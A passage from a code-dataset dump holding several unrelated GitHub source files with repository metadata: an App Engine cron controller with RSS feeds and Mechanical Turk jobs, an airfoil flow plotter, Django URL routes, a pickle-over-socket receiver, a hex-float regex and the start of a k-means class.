'http://news.stanford.edu/rss/health.xml',\n 'http://www.army.mil/rss/71/',\n 'http://www.humanrights.gov/feed/',\n 'https://www.cia.gov/news-information/your-news/cia-newsroom/RSS.xml',\n 'http://www.nist.gov/rss/physics.xml',\n 'http://www.state.gov/rss/channels/cec.xml',\n 'http://news.stanford.edu/rss/international.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/TDS/rss.xml',\n 'http://www.army.mil/rss/284/',\n 'http://www.state.gov/rss/channels/scrs.xml',\n 'http://travel.state.gov/_res/rss/TWs.xml',\n 'http://www.nist.gov/rss/transportation.xml',\n 'http://www.usaid.gov/rss/press-releases.xml',\n 'http://www.usgs.gov/rss/news.rss',\n 'http://ars.usda.gov/news/rss/rss.htm',\n 'http://travel.state.gov/_res/rss/TAs.xml',\n 'http://www.nist.gov/rss/chemistry.xml',\n 'http://www.state.gov/rss/channels/inl.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/PetHealth/rss.xml',\n 'http://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfTopic/cdrhnew-rss.cfm',\n 'http://www.nist.gov/rss/electronicsandtelecommunications.xml',\n 'http://www.state.gov/rss/channels/ct.xml',\n \"http://www.simonsfoundation.org/quanta-archive/feed/\",\n 'http://www.state.gov/rss/channels/acis.xml',\n \"http://angeion.me/feed/\",\n \"http://www.darpa.mil/Rss.aspx?Colid=24\",\n 'http://www.state.gov/rss/channels/highlights.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/Drugs/rss.xml',\n \"https://www.thecsiac.com/aggregator/rss\",\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/FoodAllergies/rss.xml',\n 'http://www.csrees.usda.gov/rss/research.xml',\n 'http://www.raconline.org/rss/pubs.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/Consumers/rss.xml',\n 'http://www.eia.gov/energy_in_brief/eibinfo.cfm',\n 'http://www.raconline.org/rss/news.xml',\n 'http://www.ferc.gov/xml/whats-new.xml',\n 'http://feeds.feedburner.com/NrelFeatureStories?format=xml',\n 'http://yosemite.epa.gov/opa/admpress.nsf/RSSByCategory?open&category=Air',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/AnimalVeterinary/rss.xml',\n 'http://www.eia.gov/about/new/wntest3.cfm',\n 'http://yosemite.epa.gov/opa/admpress.nsf/RSSByCategory?open&category=Hazardous%20Waste',\n 'http://sanctuaries.noaa.gov/feed.xml',\n 'http://yosemite.epa.gov/opa/admpress.nsf/RSS/research?opendocument',\n 'http://www.nodc.noaa.gov/OC5/RSS/wod_updates.xml',\n 'http://oceanservice.noaa.gov/rss/oceanfacts.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/FoodSafety/rss.xml',\n 'http://yosemite.epa.gov/opa/admpress.nsf/RSSByCategory?open&category=Water',\n 'http://wwwnc.cdc.gov/travel/rss/notices.xml',\n 'http://publications.nigms.nih.gov/biobeat/rss/current.xml',\n 'http://www.nodc.noaa.gov/SatelliteData/pathfinder4km/pathfinder_news_rss.xml',\n 'http://www.nih.gov/news/feed.xml',\n 'http://www2c.cdc.gov/podcasts/createrss.asp?t=r&c=340',\n 'http://www.niehs.nih.gov/news/newsroom/rssfeed/rss_news.xml',\n 'http://www.us-cert.gov/ncas/all.xml',\n 'http://www2c.cdc.gov/podcasts/createrss.asp?t=r&c=20',\n 'http://www.nasa.gov/rss/dyn/image_of_the_day.rss',\n 'http://www2c.cdc.gov/podcasts/createrss.asp?t=r&c=513',\n 'http://www.sti.nasa.gov/scan/rss99-01.xml',\n 'http://www.us-cert.gov/ncas/tips.xml',\n 'http://earthobservatory.nasa.gov/Feeds/rss/eo.rss',\n 'http://library.bldrdoc.gov/news.xml',\n 'http://www.darpa.mil/Rss.aspx?Colid=24',\n 'http://www.nasa.gov/rss/dyn/breaking_news.rss',\n 'http://www.nij.gov/documents/rss-main.xml',\n 'http://www.nist.gov/rss/bioscienceandhealth.xml',\n 'http://rss.xerox.com/xerox-news',\n 'http://www.nist.gov/rss/forensics.xml',\n 'http://www.nsf.gov/rss/rss_www_news.xml',\n \"http://feeds.feedburner.com/TheHackersNews?format=xml\",\n 'http://www.nist.gov/rss/buildingandfireresearch.xml',\n 'http://web.ornl.gov/ornlhome/rss/ornl_in_news.xml',\n 'http://apps1.eere.energy.gov/news/rss/enn.xml',\n 'http://www.nist.gov/rss/informationtechnology.xml',\n 'http://web.ornl.gov/ornlhome/rss/sns_news.xml',\n 'http://www.ntia.doc.gov/rss/updates.xml',\n 'http://news.stanford.edu/rss/arts.xml',\n 'http://www.stanford.edu/group/knowledgebase/cgi-bin/feed/',\n 'http://www.nist.gov/rss/manufacturing.xml',\n 'http://news.stanford.edu/rss/environment.xml',\n 'https://newsoffice.mit.edu/rss/school/architecture-and-planning',\n 'https://newsoffice.mit.edu/rss/research',\n 'http://www.nsf.gov/rss/rss_www_discoveries.xml',\n 'http://www.nsf.gov/rss/rss_www_news.xml',\n 'http://www.nsf.gov/rss/rss_www_news_field.xml',\n 'http://news.tamhsc.edu/feed/',\n 'http://www.nsbri.org/RSS/default.asp?ChannelTitle=Science%20and%20Technology&ChannelDesc=Science%20and%20Technology&Category=Science%20and%20Technology',\n 'http://www.janes.com/rss',\n 'http://www.justice.gov/rss/rss.opa.hp.xml',\n 'http://www.justice.gov/rss/rss.crm.hp.xml',\n 'http://www.justice.gov/atr/rss/atr_press.xml',\n #'http://feeds.feedburner.com/WIREAwardsWatch?format=xml',\n #'http://feeds.feedburner.com/indiewireTelevision?format=xml',\n 'http://feeds.feedburner.com/Criticwire?format=xml',\n #'http://feeds.feedburner.com/sundancefest_all',\n 'http://feeds.feedburner.com/WUSTL-Top-Stories-News',\n #'http://feeds.feedburner.com/indieWIREFesitvals?format=xml',\n 'http://rss.feedsportal.com/c/662/f/8410/index.rss',\n 'http://i.rottentomatoes.com/syndication/rss/top_news.xml',\n 'http://feeds.feedburner.com/alistapart/main?format=xml',\n 'http://www.pewresearch.org/feed/',\n 'http://feeds.feedburner.com/ncictresults?format=xml',\n 'http://feeds.feedburner.com/ncinewsreleases?format=xml',\n 'http://www.idiap.ch/the-institute/news/institute-news/RSS',\n #'http://feeds.feedburner.com/indieWIRENews?format=xml',\n 'http://www.idiap.ch/scientific-research/news/news/RSS',\n 'http://feeds.feedburner.com/Ifpriupdate',\n 'http://feeds.feedburner.com/IfpriPressReleases',\n 'http://feeds.feedburner.com/ilrinews',\n 'http://jp.fujitsu.com/group/fri/en/rss/fri-message.rss',\n 'http://jp.fujitsu.com/group/fri/en/rss/fri-reserchreport.rss',\n 'http://feeds.feedburner.com/NhgriPressReleases?format=xml',\n 'http://feeds.feedburner.com/WUSTL-ArtSci-News',\n \n ];\n # feeds that require custom ingestor\n #'http://www.hopkinsmedicine.org/news/media/releases',\n \n #http://www.ed.ac.uk/schools-departments/medicine-vet-medicine/news-events/all-news/latest-news\n #http://wcatwc.arh.noaa.gov/events/xml/PAAQAtom.xml\n #http://www.bnl.gov/bnlweb/rss.asp\n #http://ehp.niehs.nih.gov/feed/\n #http://www.nidcr.nih.gov/nidcr2.nih.gov/Rss/?Channel=/Research/ResearchResults/NewsReleases/\n #http://www.nidcr.nih.gov/nidcr2.nih.gov/Rss/?Channel=/Research/ResearchResults/ScienceBriefs/\n #http://apps3.eere.energy.gov/greenpower/gpn_rss.php\n #http://www.prh.noaa.gov/cphc/index-cp.xml\n #http://web.ornl.gov/ornlhome/rss/doepulse.xml\n #http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/Food/rss.xml\n #http://app.feeddigest.com/digest3/HD4A0PA7ON.rss\n #http://www.ed.gov/feed\n #http://ies.ed.gov/ncer/whatsnew/whatsnew_rss.asp\n #http://www.state.gov/rss/channels/pending.xml\n #http://www.state.gov/rss/channels/whatsnew.xml\n #http://www.state.gov/rss/channels/treatyactions.xml\n #http://www.state.gov/rss/channels/tef.xml\n #http://www.state.gov/rss/channels/statecraft.xml \n #http://www.state.gov/rss/channels/alldos.xml\n #http://www.state.gov/rss/channels/ds.xml\n #http://www.state.gov/rss/channels/opengov.xml\n #http://www.state.gov/rss/channels/social.xml\n #http://www.state.gov/rss/channels/eeati.xml\n #http://www.state.gov/rss/channels/gcj.xml\n num_feeds=len(rssfeeds)\n pagesize=int(math.ceil((0.0+num_feeds)/(0.0+24)))\n offset=(datetime.datetime.now().hour)*pagesize\n for i in range(offset,offset+pagesize):\n if i>=num_feeds:\n break\n model['num_queued']=model['num_queued']+1\n logging.info(\"queued \"+rssfeeds[i])\n rss_url=urllib2.quote(rssfeeds[i],\"\\n\")\n taskqueue.add(url=\"/json/cron/acquire_rss_articles\",params={'rss_url':rss_url},retry_options=taskqueue.TaskRetryOptions(task_retry_limit=0))\n \n \n return model\n \n \n \"\"\"\n Archive articles that people are losing interest in\n \"\"\"\n def archive_articlesAction(self):\n \n model={\"total\":[]}\n return model\n \n page=0\n limit=10\n total=0\n articles=[1]\n #articles=ArticleModel.all(keys_only=True).order(\"-sortkey\").fetch(limit,100+(page*limit))\n while articles:\n articles=ArticleModel.all().filter(\"archived =\",False).order(\"-updated\").fetch(limit,(page*limit)+100)\n page=page+1\n for article in articles:\n article.archived=True\n total=total+1\n article.save()\n # also archive the article cateogories \n article_categories=ArticleLib.getArticleCategories(article, False)\n for article_category in article_categories:\n article_category.archived=True\n article_category.save()\n \n \n \n # remove articles that have been in the top 10 more than a day\n articles=ArticleModel.all().filter(\"archived =\",False).order(\"-sortkey\").fetch(10,0)\n \n for article in articles:\n elapsed=datetime.datetime.now()-article.updated\n if elapsed.total_seconds()>86400: \n article.archived=True\n total=total+1\n article.save() \n # also archive the article cateogories \n article_categories=ArticleLib.getArticleCategories(article, False)\n for article_category in article_categories:\n article_category.archived=True\n article_category.save()\n \n model['total']=total\n logging.info(\"archived \"+str(total)+\" articles\")\n \n return model\n \n \n \n \"\"\"\n finds HITS that have been approved and whose results have been saved and removed them from mechanical turk\n \"\"\"\n def remove_old_approved_hitsAction(self):\n m=MturkLib()\n num_hits=m.remove_old_approved_hits();\n \n model={\"num_hits\":num_hits}\n message=\"removed \"+str(num_hits)+\" old approved hits\"\n logging.info(message)\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'remove_old_approved_hits results',message)\n return NullView(model)\n\n def get_question_hitsAction(self):\n model={\"approved_hits\":0}\n model['approved_hits']=MturkController().get_question_hitsAction()\n message=\"got \"+str(model['approved_hits'])+\" new questions from mechanical turk\"\n logging.info(message)\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'get_question_hits results',message)\n \n return model\n \n \n def get_fibquestion_hitsAction(self):\n model={\"approved_hits\":0}\n model['approved_hits']=MturkController().get_fibquestion_hitsAction()\n message=\"got \"+str(model['approved_hits'])+\" new questions from mechanical turk\"\n logging.info(message)\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'get_fibquestion_hits results',message)\n \n return model\n \n def turk_creates_questionAction(self,num_questions=10):\n try:\n num_questions=int(num_questions)\n model =MturkController().create_questionAction(num_questions)\n \n message=\"sent \"+str(model['numsentences'])+\" sentences to mechanical turk for conversion to a question\"\n except ValueError:\n message=\"invalid value for parameter num_questions: \"+(str(num_questions)) \n \n \n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'turk_creates_question results',message)\n return model\n \n def turk_creates_fibquestionAction(self,num_questions=10):\n try:\n num_questions=int(num_questions)\n model =MturkController().create_fib_questionAction(num_questions)\n message=\"sent \"+str(model['numsentences'])+\" sentences to mechanical turk for conversion to a question\"\n except ValueError:\n message=\"Invalid value for parameter num_questions: \"+str(num_questions)\n \n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'turk_creates_fibquestion results',message)\n return model\n \n def getsentencehitsAction(self):\n model=MturkController().getsentencehitsAction()\n message=\"got \"+str(model['num_sentences'])+\" sentences from mechanical turk\"\n logging.info(message)\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'getsentencehits results',message)\n return model\n \n def remove_approved_turk_hitsAction(self):\n MturkLib().remove_old_approved_hits()\n return None\n \n def indexAction(self):\n\n return NullView()\n \n def acquire_latest_usatoday_headlinesAction(self):\n model={'message':None}\n articles=UsaTodayLib().save_latest_headlines()\n model['message']=\"got \"+str(len(articles))+\" new articles from usatoday\"\n logging.info(model['message'])\n \n #mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'acquire_latest_usatoday_headlines results',model['message'])\n \n self.categorize_articlesAction()\n return model\n def acquire_ap_latest_headlinesAction(self):\n \n aplib=AssociatedPressLib()\n aplib.save_latest_headlines()\n #taskqueue.add(url=\"/json/cron/map_categories_to_wiki\")\n \n \n \n #TODO: tasqueue.add(url=\"/cron/acquire_sentences\");\n return NullView()\n \n \"\"\"\n attempts to set the value for CategoryModel.wikiname.\n for all categorymodels having no wikiname it asks wikipedia if it knows of such category. \n \"\"\"\n def map_categories_to_wikiAction(self):\n model={'message':\"\"}\n num_missing_cats=ArticleLib.map_categories_to_wiki()\n model['message']='Found '+str(num_missing_cats)+\" categories that I cant find a page in wikipedia for\"\n logging.info(model['message'])\n #mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'map_categories_to_wiki results',model['message'])\n \n return model\n \n \"\"\"\n find the latest articles and get wiki pages that are related to them\n \"\"\"\n def acquire_wiki_pagesAction(self,category=None):\n model={'message':\"\",'total':0}\n cats={}\n \n if category:\n cat=CategoryLib.getByTag(category)\n if not cat:\n logging.error(\"Category \"+category+\" not found\")\n return None\n if not cat.wikiname:\n #cat.wikiname=\"Fashion\"\n #cat.save()\n logging.error(\"no wiki category for \"+category)\n return None\n \n cats[category]=cat\n else:\n # get categories from latest articles\n articles=ArticleModel.all().order(\"updated\").fetch(10,0)\n for article in articles:\n article_cats=ArticleLib.getCategories(article)\n for cat in article_cats:\n if not cats.has_key(cat.name):\n cats[cat.name]=cat\n \n if not cats:\n model['message']='No articles have any categories!'\n \n for category_name in cats:\n if cats[category_name].wikiname:\n wikicat=WikiCategoryModel.all().filter(\"name =\",cats[category_name].wikiname).get()\n if wikicat:\n wikis=WikiModel.all().filter(\"category in\",[wikicat.key()]).fetch(1,0)\n if wikis:\n logging.info(\"We already have pages for \"+wikicat.name)\n else:\n wikis=WikiLib.getPages(wikicat);\n model['total']=model['total']+len(wikis)\n for wiki in wikis:\n if not wiki.title:\n logging.info(\"wiki record \"+str(wiki.key())+\" has no title\")\n continue\n \n pagecats=WikiLib.getPageCategories(wiki.title)\n flag=False\n for cat in pagecats:\n if cat.key() not in wiki.categories:\n flag=True\n #logging.info(\"tagging wiki page \"+wiki.title+\" with category \"+cat.name)\n wiki.categories.append(cat.key())\n \n if flag:\n \n wiki.save()\n \n #model['message']=\"found \"+str(len(wikis))+\" wiki pages for category \"+wikicat.name+\"\\n\"\n \n \n #if wikis:\n # for wiki in wikis:\n # taskqueue.add(url=\"/cron/acquire_sentences/\"+str(wiki.key()))\n #else:\n # logging.info(\"we dont have any pages for \"+article_cat.category.name)\n else: \n logging.info('cant find wikicategory where name='+str(cats[category_name].wikiname))\n else:\n logging.info('category '+cats[category_name].name+' has no wikicategory')\n # its often the case that there will be a wiki page having the exact same name as the category.\n # so lets try to get it\n \n model['message']=model['message']+\"\\n\"+\"found \"+str(model['total'])+\" wiki pages\"\n logging.info(model['message'])\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', \"acquire_wiki_pages results\",model['message']) \n \n return model\n \"\"\"\n gets sentences for the given page\n @param key: a datastore key for a wikimodel record \n \"\"\"\n def acquire_sentencesAction(self,key=None,category=None):\n model={'message':''}\n if key:\n wiki=WikiModel.get(key)\n \n elif category:\n cat=CategoryLib.getByTag(category)\n if not cat:\n logging.error(\"Category \"+category+\" not found\")\n return None\n if not cat.wikiname:\n logging.error(\"no wiki category for \"+category)\n return None\n wikicat=WikiLib.getCategoryByName(cat.wikiname)\n if not wikicat:\n logging.error(\"wiki category '\"+cat.wikiname+\"' not found\")\n return None\n wiki=WikiModel.all().filter(\"categories =\",wikicat).order(\"date_updated\").get()\n else:\n wikis=WikiModel.all().order(\"date_updated\").fetch(10,0)\n if wikis:\n wiki=wikis[0]\n key=wikis[0].key()\n \n \n #for all newly acquired pages, acquire sentences\n if wiki:\n t=wiki.url.split('/')\n if len(t)>0:\n title=t[len(t)-1]\n if not wiki.title:\n #wiki.title=unicode(title,errors='ignore')\n wiki.title=title.encode(\"utf-8\")\n wiki.save()\n \n sentencecount=WikiLib.getSentences(wiki)\n model['message']=\"acquired \"+str(sentencecount)+\" sentences for page \"+wiki.url.encode(\"utf-8\")\n wiki.numsentences=sentencecount\n wiki.date_updated=datetime.datetime.now()\n wiki.save()\n else:\n model['message']=\"no sentences found!\"\n \n\n logging.info(model['message'])\n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', \"acquire_sentences results\",model['message']) \n \n return model\n \n def turk_classifies_sentencesAction(self):\n model={\"numsentences\":0}\n message=\"\"\n \n sentences=SentenceModel.all().filter(\"status =\",0).order(\"updated\").fetch(5,0) # get all unprocessed sentences\n \n #for sentence in sentences:\n # logging.info(sentence.sentence)\n # logging.info(\"type=\"+str(sentence.type))\n \n if len(sentences)==0:\n logging.info('no sentences found')\n else:\n mt_lib=MturkLib()\n price=0.05\n balance=mt_lib.getAccountBalance()\n if balance < price*len(sentences):\n message=message+'you dont have enough money to run Mturk.classify_sentences()'+\"\\n\"\n else:\n message=\"sent \"+str(len(sentences))+\" to mechanical turk for classification\"+\"\\n\"\n mt_lib.classify_sentences(sentences)\n \n model['numsentences']=len(sentences)\n \n logging.info(message)\n \n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'turk_classifies_sentences results',message)\n return NullView(model)\n \n def turk_gets_sentence_subject(self):\n m=MturkLib()\n \n # get a list of sentences that have been classified but dont have any questions attached\n sentences=[]\n for sentence in sentences:\n m.get_main_subject(sentence);\n \n model={\"num_sentences\":len(sentences)}\n return NullView(model)\n \n \n \"\"\"\n Attempt to categories the most recent articles that have no categories\n \"\"\" \n def categorize_articlesAction(self):\n \n page=1\n limit=100\n articles=[1]\n article_cats=None\n while articles and not article_cats:\n article_cats=None\n articles=ArticleModel.all().order(\"-created\").fetch(limit,(page-1)*limit)\n page=page+1\n for article in articles:\n article_cats=ArticleLib.getCategories(article,False)\n if not article_cats:\n taskqueue.add(queue_name=\"articleclassify\",url='/json/article/classify/'+str(article.key()))\n \n return None\n \n \n def calculate_top_articlesAction(self):\n \n \n model={\"records\":[]}\n \n \n \"\"\"\n from webapp2_extras.appengine.auth.models import User\n users=User.query().iter()\n user=users.next() \n while user:\n logging.info(user.auth_ids[0])\n try:\n user=users.next()\n except StopIteration:\n user=None \n \"\"\"\n ArticleLib.recalculate_all_sortkeys()\n \n return model\n \n def calculate_top_commentsAction(self):\n model={}\n \n CommentsLib.calculateTopComments()\n \n return model\n \n ","repo_name":"saidwords/syytacit","sub_path":"module/cron/CronController.py","file_name":"CronController.py","file_ext":"py","file_size_in_byte":30635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4035087675","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math \nfrom plot_airfoil import plot_airfoil\n\ndef plot_exact(x,y,X,Y,r,theta,m,n,a,b,B,e,mu,Uinf,alpha):\n\t\n\tdr = (b-a)/n\n\tdtheta = 2*math.pi/m\n\tGamma = 4*math.pi*Uinf*a*np.sin(alpha) #Kutta condition\t\n\t# Vr, Vt and Cp in cilindrical coords\n\tVr = Uinf*(1-B**2/r**2)*np.cos(theta-alpha)\n\tVt = -Uinf*(1+B**2/r**2)*np.sin(theta-alpha) - Gamma/\t(2*math.pi*r)\n\n\tCp = 1 - (Vr**2+Vt**2)/Uinf**2\n\n\t# Velocity in cartesian \t\n\t\n\tU = Vr*np.cos(theta) - Vt*np.sin(theta)\n\tV = Vr*np.sin(theta) + Vt*np.cos(theta)\n\t\n\t## Jacobian of the given mapping X,Y\n\t\n\tdrdx = x/r\n\tdrdy = y/r\n\tdthetadx = -y/r**2\n\tdthetady = x/r**2\n\n\tdXdr = np.zeros((n+1,m))\n\tdXdtheta = np.zeros((n+1,m))\n\tdYdr = np.zeros((n+1,m))\n\tdYdtheta = np.zeros((n+1,m))\n\n\tfor j in range(1,int(m-1)):\n\t\tfor i in range(1,int(n)):\n\t\t\tdXdr[i,j] = (X[i+1,j] - X[i-1,j])/(2*dr)\n\t\t\tdXdtheta[i,j] = (X[i,j+1] - X[i,j-1])/(2*dtheta)\n\t\t\tdYdr[i,j] = (Y[i+1,j] - Y[i-1,j])/(2*dr)\n\t\t\tdYdtheta[i,j] = (Y[i,j+1] - Y[i,j-1])/(2*dtheta)\n\t\tdXdr[0,j] = (X[1,j] - X[0,j])/dr\n\t\tdXdr[n,j] = (X[n,j] - X[n-1,j])/dr\n\t\tdXdtheta[0,j] = (X[0,j+1] - X[0,j-1])/(2*dtheta)\n\t\tdXdtheta[n,j] = (X[n,j+1] - X[n,j-1])/(2*dtheta)\n\t\tdYdr[0,j] = (Y[1,j] - Y[0,j])/dr\n\t\tdYdr[n,j] = (Y[n,j] - Y[n-1,j])/dr\n\t\tdYdtheta[0,j] = (Y[0,j+1] - Y[0,j-1])/(2*dtheta)\n\t\tdYdtheta[n,j] = (Y[n,j+1] - Y[n,j-1])/(2*dtheta)\n\n\t## For j=0\n\tfor i in range(1,int(n)):\n\t\tdXdr[i,0] = (X[i+1,0] - X[i-1,0])/(2*dr)\n\t\tdXdtheta[i,0] = (X[i,1] - X[i,m-1])/(2*dtheta)\n\t\tdYdr[i,0] = (Y[i+1,0] - Y[i-1,0])/(2*dr)\n\t\tdYdtheta[i,0] = (Y[i,1] - Y[i,m-1])/(2*dtheta)\n\tdXdr[0,0] = (X[1,0] - X[0,0])/dr\n\tdXdr[n,0] = (X[n,0] - X[n-1,0])/dr\n\tdXdtheta[0,0] = (X[0,1] - X[0,m-1])/(2*dtheta)\n\tdXdtheta[n,0] = (X[n,1] - X[n,m-1])/(2*dtheta)\n\tdYdr[0,0] = (Y[1,0] - Y[0,0])/dr\n\tdYdr[n,0] = (Y[n,0] - Y[n-1,0])/dr\n\tdYdtheta[0,0] = (Y[0,1] - Y[0,m-1])/(2*dtheta)\n\tdYdtheta[n,0] = (Y[n,1] - Y[n,m-1])/(2*dtheta)\n\t\n\n\t## For j=m-1\n\tfor i in range(1,int(n)):\n\t\tdXdr[i,m-1] = (X[i+1,m-1] - X[i-1,m-1])/(2*dr)\n\t\tdXdtheta[i,m-1] = (X[i,0] - X[i,m-2])/(2*dtheta)\n\t\tdYdr[i,m-1] = (Y[i+1,m-1] - Y[i-1,m-1])/(2*dr)\n\t\tdYdtheta[i,m-1] = (Y[i,0] - Y[i,m-2])/(2*dtheta)\n\tdXdr[0,m-1] = (X[1,m-1] - X[0,m-1])/dr\n\tdXdr[n,m-1] = (X[n,m-1] - X[n-1,m-1])/dr\n\tdXdtheta[0,m-1] = (X[0,0] - X[0,m-2])/(2*dtheta)\n\tdXdtheta[n,m-1] = (X[n,0] - X[n,m-2])/(2*dtheta)\n\tdYdr[0,m-1] = (Y[1,m-1] - Y[0,m-1])/dr\n\tdYdr[n,m-1] = (Y[n,m-1] - Y[n-1,m-1])/dr\n\tdYdtheta[0,m-1] = (Y[0,0] - Y[0,m-2])/(2*dtheta)\n\tdYdtheta[n,m-1] = (Y[n,0] - Y[n,m-2])/(2*dtheta)\n\n\t## Now the Jacobian in cartesian \n\t\n\tdXdx = dXdr*drdx + dXdtheta*dthetadx\n\tdXdy = dXdr*drdy + dXdtheta*dthetady\n\tdYdx = dYdr*drdx + dYdtheta*dthetadx\n\tdYdy = dYdr*drdy + dYdtheta*dthetady\n\t\n\t## Velocity fields in the real domain using Jacobian mapping\n\n\tUreal = U*dXdx + V*dXdy\n\tVreal = U*dYdx + V*dYdy\n\t\n\t## Plotting in the real plane\n\t\n\tfig2 = plt.figure(2)\n\tplt.contour(X,Y,Cp,24)\n\tplot_airfoil(e,mu,a)\n\tplt.title('Pressure coefficient')\n\tplt.axis('equal')\n\t\n\tfig3 = plt.figure(3)\n\tplt.quiver(X,Y,Ureal,Vreal)\n\tplot_airfoil(e,mu,a)\n\tplt.title('Velocity field')\n\tplt.axis('equal')\n\t\n\t## Plotting the grids\n\n\tfig4 = plt.figure(4)\n\tplt.plot(x,y,'b.')\n\tcircle3 = plt.Circle((e,mu),radius=a,fill=False)\n\tplt.gcf().gca().add_artist(circle3)\n\tplt.title('Cylinder plane grid')\n\tplt.plot(x[1,:],y[1,:],'r.')\n\tplt.plot(x[2,:],y[2,:],'g.')\n\n\tfig5 = plt.figure(5)\n\tplt.plot(X,Y,'b.')\n\tplot_airfoil(e,mu,a)\n\tplt.title('Real plane grid')\n\tplt.plot(X[1,:],Y[1,:],'r.')\n\tplt.plot(X[2,:],Y[2,:],'g.')\t\n\t\n\treturn [fig2, fig3, fig4, fig5]\t\n\t\n","repo_name":"aramisentreri/CFD-projects","sub_path":"plot_exact.py","file_name":"plot_exact.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23386353241","text":"def check(grass,m,n):\n rmax = []\n cmax = []\n for i in range(m):\n row = grass[i*n:i*n + n]\n rmax.append(max(row))\n print(row)\n\n for i in range(n):\n col = grass[i::n]\n cmax.append(max(col))\n\n for i in range(n):\n for j in range(m):\n if grass[j*n + i] < min(rmax[j],cmax[i]):\n return \"NO\"\n\n return \"YES\"\n\nf_in = open(\"input.txt\")\nf_out = open(\"output.txt\",\"+w\")\nn_cases = int(f_in.readline())\ncase = 0\nwhile(case//',views.task_detail,name='task_d'),\n path('tasks///complete/',views.completeTask,name='task_c'),\n path('tasks///delete/',views.deleteTask,name='task_del'),\n path('blog/',views.menajes_blog,name='blog'),\n path('blog///',views.deleteMensaje,name=\"mensaje_del\"),\n path('tasks/subtask/delete///',views.delete_subtask,name='subtask_del'),\n path('task///subtask/create/',views.create_subtask,name='create_subtask'),\n path('tasks/subtask_detail///',views.subtask_detail,name='subtask_d'),\n path('blog/private///',views.chat_privado,name='private_chat'),\n path('blog/private/delete////',views.deletePrivateMensaje,name='pm_del')\n]\n","repo_name":"DanielMonto/app","sub_path":"app-files/app_auth_tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4754625007","text":"import socket\nfrom genpickle import gen_pickle, gen_unpickle\n\n\ndef receivefrom(addr):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(addr)\n s.listen(5)\n c, a = s.accept()\n for item in gen_unpickle(c.makefile(mode='rb')):\n yield item\n c.close()\n\n\nif __name__ == '__main__':\n for r in receivefrom(('0.0.0.0', 3333)):\n print('[{}] {}'.format(r['host'], r['request']))\n","repo_name":"jsculsp/TCP-nginx-","sub_path":"receivefrom/receivefrom.py","file_name":"receivefrom.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35006639330","text":"import re\nimport sys\n\ndec_digit = '[0-9]'\nhex_digit = f'{dec_digit}|[a-f]|[A-F]'\nexp = 'p|P'\nsuff = '(f|F|l|L)?' \nsign = '(\\\\+|-)?'\nhexa = f'({hex_digit})+' \nhex_floating_point = f'^(0x|0X)({hexa}|{hexa}.{hexa}|.{hexa})({exp})({sign})({dec_digit}+)({suff})$'\n\nreg = re.compile(hex_floating_point)\n\nfilepath = sys.argv[1]\n\nfp = open(filepath)\n#print (f'Regular expression for a hexadecimal floating point: {hex_floating_point}')\nfor line in fp.readlines():\n line = line.strip()\n print(f'{\"Matched:\" if reg.search(line) else \"Not Matched:\"} {line}')","repo_name":"tainagdcoleman/cecs524","sub_path":"Assignment 3/Assn3.py","file_name":"Assn3.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69951816514","text":"\"\"\"Contens URLs.\"\"\"\n\n# Django\nfrom django.urls import path\n\n# Views\nfrom .views import contents\n\nurlpatterns = [\n path(\n route='ver//',\n view=contents.ContentDetailView.as_view(),\n name='detail'\n ),\n path(\n route='send/',\n view=contents.SendExampleURL.as_view(),\n name='send'\n )\n]\n","repo_name":"aleducode/hacku_backend","sub_path":"hacku/contents/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"16623997215","text":"import math\nimport numpy as np\nfrom copy import copy\nimport random\n\n\nclass KMeans:\n @staticmethod\n def evclid_distance(a, b):\n distance = 0\n for i in range(len(a)):\n distance = distance + (b[i] - a[i]) ** 2\n return math.sqrt(distance)\n\n @staticmethod\n def sity_distance(a, b):\n distance = 0\n for i in range(len(a)):\n distance = distance + abs(b[i] - a[i])\n return math.sqrt(distance)\n\n @staticmethod\n def chees_distance(a, b):\n distance = []\n for i in range(len(a)):\n distance.append(abs(b[i] - a[i]))\n return max(distance)\n\n @staticmethod\n def get_center_of_mass(points, center_of_mass):\n if len(points) == 0:\n return center_of_mass\n np_array = []\n\n for p in points:\n np_array.append(np.array(p[1]))\n\n vec = sum(np_array) / 